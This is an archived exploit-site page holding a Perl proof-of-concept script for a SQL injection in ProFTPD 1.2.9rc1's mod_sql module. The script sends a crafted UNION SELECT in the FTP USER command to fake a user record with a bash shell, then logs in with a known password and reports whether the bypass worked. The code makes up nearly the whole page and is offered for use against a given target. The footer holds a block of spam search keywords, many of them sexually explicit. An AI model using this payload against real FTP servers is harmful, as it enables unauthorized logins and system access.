about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , ProFTPD 1.2.9rc1 mod_sql SQL Injection remote Exploit




2003-06-19 ProFTPD 1.2.9rc1 mod_sql SQL Injection remote Exploit
#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if(@ARGC<2){
 print "\nProof Of Concept Sql Inject on ProFTPD\n";
 print "Usage: perl poc-sqlftp <target> [1=Alternate
query]\n\n";
 exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = 
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)

 or die "Can't connect. \n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
 print $remote "USER ')UNION 
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
 print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' 
WHERE(''='\n";
};
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){ #logged in
 print "[------- Sql Inject Able \n";
}else{
 print "[------- Sql Inject Unable \n";
}
close $remote;


securitydot.net - 2003-06-19

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 06:48:38 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
redtube.co big doobs www.bigyu. ADITI AGAR www.blue f Telugu sex ask.148com Www.seks.l Www.xxx.co www.tuyaba waldsex Gaysex.com CISCO IOS TN RESULT Banglasex. lezbian se www.xsjz.c porn tube PHP/4.4.7 WWO Banglasex. 89 com news for c www.tamina Arabic sex in cit panther www.44rent passportst TFTP my vagina Www.kids s Katreenase t946t piczo Katreenase administra www.iammt8 direct con Adolesente exploit 2. Bbc urdu.C hot.sex modules/xg Foto bugil news for c www.fcvod. NEOSTATS qwvnvyee Anarkali/i